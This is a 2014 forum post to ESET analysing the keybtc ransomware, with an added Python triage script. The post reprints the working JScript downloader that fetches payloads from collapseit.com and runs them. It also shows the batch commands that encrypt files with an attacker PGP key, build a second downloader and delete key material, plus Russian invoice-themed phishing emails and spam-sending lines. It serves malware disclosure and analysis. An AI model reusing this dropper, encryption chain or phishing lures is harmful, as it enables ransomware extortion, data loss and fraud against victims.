
VBS/TrojanDownloader.Agent.NKM Trojan Horse



Since 2014/08/05 there has been this new ransomware.

 

On 2014/08/06 I sent you a sample, and you added detection and blocked the download of the .zip file, but ESET does not detect the .btc file:

https://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/

 

**********************************************************************************************************

The ESET Malware Response Team has had the file since 2014/08/06:
06/08/2014 20:05:16 Kernel ESET The file 'D:\A MALWARE\keybtc.btc' was sent to ESET for analysis.
*****************************************************************************

 

 

LET ME EXPLAIN

 

After execution, this *.JS file downloads a lot of files and does a lot of work.

 

Information thanks to @MalwareHunter (malwaretips.com).

 

JS file

////////// autoreplicant bot /////////
///////////////////  var intoxicated twice ////////////////

// URLs are defanged (hxxp) as in the post. Note WshShell and tfolder are declared twice.
var nosensetoblock = "collapseit.com",
    tfolder = "%TEMP%\\",
    WshShell = WScript.CreateObject("WScript.Shell");

// Fetch URL c with MSXML2.XMLHTTP and write the raw response body to path d via ADODB.Stream
function autoreply(c, d) {
    var b = new ActiveXObject("MSXML2.XMLHTTP");
    b.onreadystatechange = function () {
        if (4 === b.readyState) {
            var a = new ActiveXObject("ADODB.Stream");
            a.open();
            a.type = 1;              // adTypeBinary
            a.write(b.ResponseBody);
            a.position = 0;
            a.saveToFile(d, 2);      // adSaveCreateOverWrite
            a.close();
        }
    };
    b.open("GET", c, !1);            // synchronous request
    b.send();
}

var genesis = "%TEMP%\\keybtc.cmd",
    autorotatedomain = "images";

function CreateObject(c) { return new ActiveXObject(c); }

var WshShell = CreateObject("WScript.Shell"),
    tfolder = WshShell.ExpandEnvironmentStrings(tfolder),
    docrun = "%TEMP%\\document.doc";

// Download document.btc as document.doc and open it in a visible window (window style 1)
try {
    autoreply("hxxp://" + nosensetoblock + "/" + autorotatedomain + "/document.btc", "" + tfolder + "document.doc");
    WshShell.Run("" + docrun + "", 1, 0);
} catch (docs) {}

// Fetch the remaining payload parts into %TEMP%
autoreply("hxxp://" + nosensetoblock + "/" + autorotatedomain + "/day.btc", "" + tfolder + "day.btc");
autoreply("hxxp://" + nosensetoblock + "/" + autorotatedomain + "/null.btc", "" + tfolder + "null.btc");
autoreply("hxxp://" + nosensetoblock + "/" + autorotatedomain + "/sad.btc", "" + tfolder + "sad.btc");
autoreply("hxxp://" + nosensetoblock + "/" + autorotatedomain + "/keybtc.btc", "" + tfolder + "keybtc.cmd");

// Run the downloaded batch file hidden (window style 0) without waiting for it
WshShell.Run("" + genesis + "", 0, 0);

 

OK, it downloads these files:

hxxp://collapseit.com/images/sad.btc - MD5: e189b5ce11618bb7880e9b09d53a588f
https://www.virustotal.com/it/file/97d27e1225b472a63c88ac9cfb813019b72598b9dd2d70fe93f324f7d034fb95/analysis/1406556814/

hxxp://collapseit.com/images/null.btc - MD5: 778232ba5aa586021a27ec2bf4e7b99a
https://www.virustotal.com/it/file/c201989c78d9f8a8c8a18577b3deb6baf71fbc13594e545015ba96d69da724dc/analysis/1407318858/

hxxp://collapseit.com/images/day.btc - MD5: 352369b32c971e1a7f56ef29593abb44
https://www.virustotal.com/it/file/1e56cc30ea50c74c6795a9aed142ad5e5fd51ddc17080f948cb23d647c5b8553/analysis/1407196678/

hxxp://collapseit.com/images/document.btc - MD5: 50a561c0d0f0c49974dfb15763f73202
https://www.virustotal.com/it/file/62a86e1ba6b2d629ec54822c1ca16ef995cd9f18965f03fa918486f2f3795192/analysis/1407320991/

hxxp://collapseit.com/images/keybtc.btc - MD5: 3ca63d203556c63d5e0c06d78f6aae4c
https://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/1407331101/

After execution:

 

keybtc.btc (after drop: keybtc.cmd)

C:\Users\%UserName%\AppData\Local\Temp>echo Key-Type: RSA 1>genrsa.btc
C:\Users\%UserName%\AppData\Local\Temp>echo Key-Length: 1024 1>>genrsa.btc
C:\Users\%UserName%\AppData\Local\Temp>echo Name-Real: genesis 1>>genrsa.btc
C:\Users\%UserName%\AppData\Local\Temp>echo Name-Comment: keybtc@gmail.com 1>>genrsa.btc
C:\Users\%UserName%\AppData\Local\Temp>echo Name-Email: keybtc@gmail.com 1>>genrsa.btc
C:\Users\%UserName%\AppData\Local\Temp>echo -----BEGIN PGP PUBLIC KEY BLOCK----- 1>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo Version: GnuPG v1 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo.1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo mQENBFPgfZQBCACwmI/ra8/PJnw1YAvQZ8mszyEtIfJ4GA2jTM3ih9qCWMRb3cCI 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo heeVFaBTyAp33AP0EGjRDcg7E4VihowO2zCqJa7QkEfxVLwYKbEiEEnns4VDNnut 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo eOsyHF/ZyiNshYUN3Fj+YiFMtOzEUcJEE0QuUfl2o0Ajl9BRz3cQPPSnUhKS/vmc 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo Fut1Y5GcJVWhjl4f51Grp1Q5lB9ndqCVGpG7PZ7tqQgA6934DOjGQQF3BK9ZuSJq 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo v4bMKs12cOndOIFuoim/KV5NL4wXlUes7GIlTp4P3izlobNlVfYKXgS4Vc/H/FiA 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo YVOaB7L4rVXwc7oixYSI1a4TwqXfifDhJNSRABEBAAG0ImtleWJ0YyAoa2V5YnRj 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo KSA8a2V5YnRjQGdtYWlsLmNvbT6JATgEEwECACIFAlPgfZQCGwMGCwkIBwMCBhUI 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo AgkKCwQWAgMBAh4BAheAAAoJEIUsFvyqtih1ly4IAJlYEiJX2VeXV77c8M/0PRtN 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo XAGmgFjt9WNvnMGlvAY88/QUMwMU9XV2gXTc+KiLacuagofhGpHOuZf3suSBYMDS 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo oi135YTGs1sAWOx2kBwmyW8rrNLZ84V4wa97I9nEbzIYB0thzr3euu0QTz78hj2v 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo Gai2uA82F45XFcjXhPKINbSgMCYIpbhfjUCMbSVy8+3rF9fUDWICVwzAof467GOI 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo b4SKcDkX5IOzDugDnKXvKwDNr9fcomZhhVUz5djF1TTORc0qXQye2GiFa6ZtE4aH 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo WFw6hKfBIgaJGFIqnr7be0Di1duWisnCYS2n9/VDcZpeOpv7uqc78KDJ+Ogm27W5 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo AQ0EU+B9lAEIAMcXK4tuglxptwQKg4aODX8OnSbAyAQW5QHTK9d4GG40vry8IJVx 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo pUYe7fgax7OIkKLnYjo0uNXnBD70e3Z80WhDK1/2eIC4MxqVAD4cKP2yKZOFLKi2 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo BJ7BdYk+y4d2MgqGuGIt84Wp0Zrcs1O32pS2lXfaBxjREaAUuqzy4MU0AJ5+5tK0 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo qeD1OTxJhYivIky/qrmDtMf0G/WzxULV1iy0pkDP/s44KmsQxept3MzmCMgdAXmg 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo 2ANdP5r+UOglQeLKBmyLhCAcNqvHPU5I2X5qWmAbU0Z8IT/M1m/SE0/r9VF63C+Y 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo g3HQQDVZYOFWqi2uHOoU/LZ157kgF5gYqNUAEQEAAYkBHwQYAQIACQUCU+B9lAIb 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo DAAKCRCFLBb8qrYodQp3B/0SeVJOLU+3gmq+R7VLqNbeS6NZ9KnZQvda3vyE0/+t 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo FGx3Xo6Gf4chi+hTY33Ph+/4xA0cFg3i2YDSZRunDKG3OavrRDIpF6SNIH/X/sPU 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo IQxATi1Sq/EmNzJdAqqqYNQT7YlWyVjI2pLcbberET+9LHIMcatnQ08GZQDViiSI 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo o7fW4sVYMgnRS5OXOwzMqW7wLuLbIGuTZQXTIOAoOhuZtfmy5woCRwF9sygYu5yw 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo iwQkX2P/Ffzwrpu92J8uqoVeUXdBV8bgnK92KKKi/F4czak/DLa453cLlwozPxSv 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo 6/RKzQXVaopzuOdvdRTwKSb+mFr+gsMlQ1t7xNcMdW84 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo =yxjK 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp>echo -----END PGP PUBLIC KEY BLOCK----- 1>>2048key.btc

"C:\Users\%UserName%\AppData\Local\Temp\svchost.exe" -r keybtc --yes --trust-model always --no-verbose -q --encrypt-files "C:\Users\%UserName%\AppData\Local\Temp\secring.gpg"

(Remark: svchost.exe is the dropped null.btc after renaming.)

 

(Creates another JS file)

C:\Users\%UserName%\AppData\Local\Temp>echo var earthlingsfilm="collapseit.com",WshShell=WScript.CreateObject("WScript.Shell");function touchdown(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="autoreplicant";touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/coherence.btc","coherence.btc"); 1>autoreplicant.js

C:\Users\%UserName%\AppData\Local\Temp>echo touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/lsass.btc","lsass.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spool.btc","spool.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spoolsv.btc","spoolsv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/sv.btc","sv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/tobi.btc","tobi.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/collapse.btc","collapse.btc"); 1>>autoreplicant.js

It also creates HTML files (filename: ltr*.html) with links like this:

hxxp://bit.ly/invoice2014 (ESET blocks all of these downloads)

C:\Users\%UserName%\AppData\Local\Temp>copy /b "C:\Users\%UserName%\AppData\Local\Temp\collapse.btc" + "C:\Users\%UserName%\AppData\Local\Temp\tobi.btc" ttl.exe

C:\Users\%UserName%\AppData\Local\Temp>del /f /q tobi.btc   & del /f /q collapse.btc

C:\Users\%UserName%\AppData\Local\Temp>RENAME lsass.btc lsass.exe

C:\Users\%UserName%\AppData\Local\Temp>RENAME coherence.btc coherence.exe

C:\Users\%UserName%\AppData\Local\Temp>RENAME spoolsv.btc spoolsv.exe

C:\Users\%UserName%\AppData\Local\Temp>RENAME spool.btc blat.lib

C:\Users\%UserName%\AppData\Local\Temp>RENAME sv.btc blat.dll

C:\Users\%UserName%\AppData\Local\Temp>ttl.exe -f ttl.pwd

C:\Users\%UserName%\AppData\Local\Temp>taskkill /f /im 1Cv8N.exe

C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\autoreplicant.js"

 

(Remark: these *.btc files are dropped by the second JS file, autoreplicant.js.)

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo Здравствуйте,<br> 1>>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo Как и договаривались с вашим руководством, пересылаю Вам счет для оплаты (во вложении). Организуйте, пожалуйста, платеж.<br> 1>>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo Когда бухгалтерия все проведет, отпишитесь мне - я проверю приход денег. <br> 1>>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo Договор у Вас имеется? Или мне выслать копию? <br><br> 1>>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>Вложения (1):</b><br> 1>>ltr1.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/invoice2014">Счет_для_оплаты (авг.).zip</a> 1>>ltr1.html

(Translation of ltr1: "Hello, / As agreed with your management, I am forwarding you the invoice for payment (attached). Please arrange the payment. / Once accounting has processed everything, let me know - I will check that the money has arrived. / Do you have the contract? Or should I send you a copy? / Attachments (1): 1. Invoice_for_payment (Aug.).zip")

C:\Users\%UserName%\AppData\Local\Temp>set RND0=22361

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr2.html

C:\Users\%UserName%\AppData\Local\Temp>echo Наши бухгалтера попросили переслать Вам счет СФ-14-22361 (см. приложение).<br>Вы могли бы узнать, была ли по нему оплата?<br>По данным нашей базы по этому платежу за Вами висит долг. Возможно, какая-то ошибка.<br>Проверьте, пожалуйста.<br><br> 1>>ltr2.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>Вложения (1):</b><br> 1>>ltr2.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/invoice142014">Счет СФ-14-22361_2014.zip</a> 1>>ltr2.html

(Translation of ltr2: "Our accountants asked me to forward you invoice SF-14-22361 (see attachment). Could you find out whether it has been paid? According to our records there is an outstanding debt on your side for this payment. Possibly some mistake. Please check. / Attachments (1): 1. Invoice SF-14-22361_2014.zip")

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr3.html

C:\Users\%UserName%\AppData\Local\Temp>echo Уважаемые коллеги, <br> 1>>ltr3.html

C:\Users\%UserName%\AppData\Local\Temp>echo Мы проводим ежемесячную сверку. В приложении - проект Акта по Вашему предприятию.<br>Нам получается долг примерно на 10 тыс. Проверьте по своим базам, все ли правильно. <br> 1>>ltr3.html

C:\Users\%UserName%\AppData\Local\Temp>echo Жду ответа, спасибо. <br><br> 1>>ltr3.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>Вложения (1):</b><br> 1>>ltr3.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/revise2014">Проект Акта сверки-2014.zip</a> 1>>ltr3.html

(Translation of ltr3: "Dear colleagues, / We are carrying out the monthly reconciliation. Attached is the draft reconciliation statement for your company. By our figures there is a debt of roughly 10 thousand. Please check against your own records whether everything is correct. / Awaiting your reply, thanks. / Attachments (1): 1. Draft reconciliation statement-2014.zip")

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo Здравствуйте,<br> 1>>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo Наша бухгалтерия проверила оплату по старым поставкам. <br> 1>>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo К письму приложена копия Акта сверки по Вашему предприятию. Согласно нашей информации Вы нам немного недоплатили по двум счетам.<br> 1>>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo Проверьте указанные данные, пожалуйста. <br><br> 1>>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>Вложения (1):</b><br> 1>>ltr4.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/revisecopy2014">Копия Акта сверки (2014).zip</a> 1>>ltr4.html

(Translation of ltr4: "Hello, / Our accounting department has checked the payments for the old deliveries. / Attached to this letter is a copy of the reconciliation statement for your company. According to our information you underpaid us slightly on two invoices. / Please check the figures. / Attachments (1): 1. Copy of reconciliation statement (2014).zip")

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr5.html

C:\Users\%UserName%\AppData\Local\Temp>echo День добрый, <br> 1>>ltr5.html

C:\Users\%UserName%\AppData\Local\Temp>echo Мы проплатили по Вашему счету (скан-копия платежного поручения в аттаче). Проверьте приход денег и отпишитесь.<br>Надеюсь, с реквизитами все нормально. <br><br> 1>>ltr5.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>Вложения (1):</b><br> 1>>ltr5.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/scancopy2014">Cкан-копия платежного поручения.zip</a> 1>>ltr5.html

(Translation of ltr5: "Good day, / We have paid your invoice (scanned copy of the payment order attached). Please check that the money has arrived and let us know. / I hope the bank details are all fine. / Attachments (1): 1. Scanned copy of payment order.zip")

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr6.html

C:\Users\%UserName%\AppData\Local\Temp>echo Наша бухгалтерия провела платеж по Вашему счету (платежка с отметкой банка во вложении). Посмотрите, пришли ли деньги. Жду ответа, спасибо. <br><br> 1>>ltr6.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>Вложения (1):</b><br> 1>>ltr6.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/payment20143991">Платежка_отметка банка (aug).zip</a> 1>>ltr6.html

(Translation of ltr6: "Our accounting department has made the payment on your invoice (payment slip with the bank's stamp attached). Please check whether the money has arrived. Awaiting your reply, thanks. / Attachments (1): 1. Payment slip_bank stamp (aug).zip")

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr7.html

C:\Users\%UserName%\AppData\Local\Temp>echo Пересылаю Вам Акты приема-передачи по Договору от 02.08.2014 года (во вложении). Посмотрите, все ли там нормально по содержанию. Если что, мы со своей стороны подписываем документы и высылаем Вам оригиналы. <br><br> 1>>ltr7.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>Вложения (1):</b><br> 1>>ltr7.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/recandtransmiss2014">Акты приема-передачи.zip</a> 1>>ltr7.html

(Translation of ltr7: "I am forwarding you the acceptance certificates under the Contract dated 02.08.2014 (attached). Please check that the content is all in order. If so, we will sign the documents on our side and send you the originals. / Attachments (1): 1. Acceptance certificates.zip")

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr8.html

C:\Users\%UserName%\AppData\Local\Temp>echo Наша бухгалтерия не может найти несколько Актов приема-передачи по договорам, заключенным с Вами.<br>Проблема в том, что у нас со дня на день должна начаться проверка ФНС.<br>Можете посмотреть, есть ли у Вас оригиналы этих документов (сканы во вложении)?<br> 1>>ltr8.html

C:\Users\%UserName%\AppData\Local\Temp>echo Прошу ответить максимально оперативно. Спасибо. <br><br> 1>>ltr8.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>Вложения (1):</b><br> 1>>ltr8.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/rectrans2014">Акты по приему-передчи_2014г.zip</a> 1>>ltr8.html

(Translation of ltr8: "Our accounting department cannot find several acceptance certificates under the contracts concluded with you. / The problem is that a tax authority (FNS) audit is due to start any day now. / Could you check whether you have the originals of these documents (scans attached)? / Please reply as quickly as possible. Thank you. / Attachments (1): 1. Acceptance certificates_2014.zip")

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo Здравствуйте,<br> 1>>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo В связи с изменениями в ценовой политике нашей компании, мы разработали типовое дополнительное соглашение для подписания с нашими актуальными контрагентами.<br>Ознакомьтесь с документом в приложении и ответьте по готовности подписания. <br> 1>>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo В случае необходимости, мы готовы рассмотреть Ваши правки. <br> 1>>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo Спасибо. <br><br> 1>>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>Вложения (1):</b><br> 1>>ltr9.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/supplementaryagr3381">Типовое доп.соглашение.zip</a> 1>>ltr9.html

(Translation of ltr9: "Hello, / In connection with changes in our company's pricing policy, we have drawn up a standard supplementary agreement to be signed with our current counterparties. / Please review the attached document and let us know when you are ready to sign. / If necessary, we are prepared to consider your amendments. / Thank you. / Attachments (1): 1. Standard supplementary agreement.zip")

C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr10.html

C:\Users\%UserName%\AppData\Local\Temp>echo День добрый, <br> 1>>ltr10.html

C:\Users\%UserName%\AppData\Local\Temp>echo В продолжение переговоров с нашим директором, направляю Вам для рассмотрения проект договора (в приложении). Ознакомьтесь с документом.<br>Просьба исправления вносить в режиме правок.<br><br>Спасибо<br><br> 1>>ltr10.html

C:\Users\%UserName%\AppData\Local\Temp>echo <b>Вложения (1):</b><br> 1>>ltr10.html

C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/draft77182">Проект договора (2014г).zip</a> 1>>ltr10.html

(Translation of ltr10: "Good day, / Following the talks with our director, I am sending you the draft contract for review (attached). Please look through the document. / Please make any corrections in track-changes mode. / Thank you / Attachments (1): 1. Draft contract (2014).zip")

echo spoolsv.exe ltr!R!.html -server smtp.mail.ru -port 587 -f !validmail! -u !validmail! -pw !Spamail! -priority 1 -sensitivity 2 -noh -noh2 -ss -html -to %a 1>>readbook.cmd )  
 

*There are some more commands like this. It seems that this script also sends spam...

 

 

 

And finally... it deletes a lot of files and opens a link:

C:\Users\%UserName%\AppData\Roaming>del /f /q "C:\Users\%UserName%\AppData\Roaming\gnupg\*.*"
C:\Users\%UserName%\AppData\Roaming>rmdir /s /q "C:\Users\%UserName%\AppData\Roaming\gnupg"
C:\Users\%UserName%\AppData\Roaming>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\sdelete.exe"
C:\Users\%UserName%\AppData\Roaming>start hxxp://bit.ly/keybtc
C:\Users\%UserName%\AppData\Roaming>cd "C:\Users\%UserName%\AppData\Local\Temp"
C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\pubring.bak"
C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\ltr*.html"
C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\pubring.gpg"
C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\secring.gpg"
C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\trustdb.gpg"
C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\random_seed"
C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\crypta.bin"
C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.lock"
C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.btc"
C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.html"
C:\Users\%UserName%\AppData\Local\Temp>del /f /q keybtc.cmd

Remark: start hxxp://bit.ly/keybtc (resolves to hxxp://en.wikipedia.org/wiki/RSA_(cryptosystem)#Key_generation). Why does it open this Wikipedia page?

 

Information above from @MalwareHunter (malwaretips.com).

 

Can you explain why, 3 days after I sent the file, keybtc.btc is still undetected?

 

https://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/

 

Vendor      Detection name                    Engine date
AVG         Generic11_c.QPE                   20140808
Avast       Other:Malware-gen [Trj]           20140807
DrWeb       BAT.Encoder.23                    20140808
Emsisoft    Trojan-Ransom.BAT.Agent (A)       20140808
GData       Script.Trojan-Ransom.Scatter.A    20140808
Kaspersky   Trojan-Ransom.BAT.Scatter.s       20140808
Microsoft   Ransom:BAT/Xibow.A                20140808
Symantec    Trojan Horse                      20140808
Tencent     Bat.Trojan.Scatter.Lnes           20140808
ESET        ??????

For every file I sent you, I gave you the source link to download it.

 

When will the ESET Malware Response Team add detection?

Why does the ESET Malware Response Team not block the download of the *.btc files, and only block the *.zip file from collapseit.com?

Why has the ESET Malware Response Team not answered my mail for 3 days?

 

Thanks

Edited by JAMEWT
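As an added triage example (my code, not part of JAMEWT's post and not tooling from @MalwareHunter or ESET), the Python below works on the artifacts quoted above without touching the network or needing GnuPG installed: it resolves the download URLs and drop paths that the JScript dropper assembles from concatenated variables, lists the WSH downloader markers the script relies on (MSXML2.XMLHTTP, ADODB.Stream, saveToFile, WScript.Shell, Run), and decodes the OpenPGP packet header at the start of the attacker's 2048key.btc to recover the key's algorithm, size and creation time. The dropper text is an abridged copy of the posted script (three of its five download calls, hxxp kept as defanged), the armor line is the first line of the key block keybtc.cmd writes, and the genrsa.btc parameters are the ones it echoes; the marker list and the dictionary layout are my own choices.

```python
"""Triage helpers for the keybtc dropper and key material quoted in the post.

Added example, not code from the post, @MalwareHunter or ESET. The JScript,
armor line and genrsa.btc parameters are copied from the post (URLs stay
defanged as hxxp); the marker list and output layout are my own assumptions.
"""
import base64
import re
from datetime import datetime, timezone

# Abridged copy of the posted dropper: three of its five download calls.
DROPPER_JS = r'''
var nosensetoblock="collapseit.com",tfolder="%TEMP%\\",WshShell=WScript.CreateObject("WScript.Shell");
function autoreply(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){
  if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);
  a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}
var genesis="%TEMP%\\keybtc.cmd",autorotatedomain="images",docrun="%TEMP%\\document.doc";
try{autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/document.btc",""+tfolder+"document.doc"),WshShell.Run(""+docrun+"",1,0)}catch(docs){}
autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/null.btc",""+tfolder+"null.btc");
autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/keybtc.btc",""+tfolder+"keybtc.cmd");
WshShell.Run(""+genesis+"",0,0);
'''

# Objects and methods that together form the WSH "download, write to disk, run" pattern.
DOWNLOADER_MARKERS = ("MSXML2.XMLHTTP", "ADODB.Stream", "saveToFile", "WScript.Shell", ".Run(")


def downloader_indicators(js):
    """Return the downloader markers present in the script, in a fixed order."""
    return [m for m in DOWNLOADER_MARKERS if m in js]


def extract_downloads(js):
    """Return (url, drop_path) pairs for every download(URL, PATH) call,
    resolving the simple name="literal" variables the dropper concatenates."""
    literals = {k: v.replace("\\\\", "\\")          # undo the JS backslash escape
                for k, v in re.findall(r'(\w+)="([^"]*)"', js)}

    def resolve(expr):
        parts = re.findall(r'"([^"]*)"|\+(\w+)', expr)
        return "".join(literals.get(name, "<" + name + ">") if name else lit
                       for lit, name in parts)

    pairs = []
    for inner in re.findall(r'\(("hxxps?://"[^()]*)\)', js):
        url_expr, path_expr = inner.split(",", 1)
        pairs.append((resolve(url_expr), resolve(path_expr)))
    return pairs


# First radix-64 line of the public key block that keybtc.cmd writes to 2048key.btc.
ARMOR_LINE_1 = "mQENBFPgfZQBCACwmI/ra8/PJnw1YAvQZ8mszyEtIfJ4GA2jTM3ih9qCWMRb3cCI"
PK_ALGOS = {1: "RSA", 16: "ElGamal", 17: "DSA"}  # RFC 4880 section 9.1


def parse_public_key_header(armor_line):
    """Decode the leading OpenPGP Public-Key packet (RFC 4880 sections 4.2, 5.5.2).
    Header, version, creation time, algorithm and the bit length of the first MPI
    (the RSA modulus n) sit in the first 11 bytes, so one armor line is enough."""
    data = base64.b64decode(armor_line)
    tag_byte = data[0]
    if not tag_byte & 0x80 or tag_byte & 0x40:
        raise ValueError("expected an old-format packet header")
    tag, ltype = (tag_byte >> 2) & 0x0F, tag_byte & 0x03
    if ltype == 3:
        raise ValueError("indeterminate-length packet")
    hdr_len = 1 + (1, 2, 4)[ltype]
    body = data[hdr_len:]
    if tag != 6 or body[0] != 4:
        raise ValueError("not a version 4 Public-Key packet")
    algo = body[5]
    return {
        "version": 4,
        "packet_length": int.from_bytes(data[1:hdr_len], "big"),
        "created": datetime.fromtimestamp(int.from_bytes(body[1:5], "big"), tz=timezone.utc),
        "algorithm": PK_ALGOS.get(algo, "algo %d" % algo),
        "bits": int.from_bytes(body[6:8], "big"),
    }


# Unattended key-generation parameters that keybtc.cmd echoes into genrsa.btc
# (GnuPG --batch --gen-key format, one "Name: value" per line).
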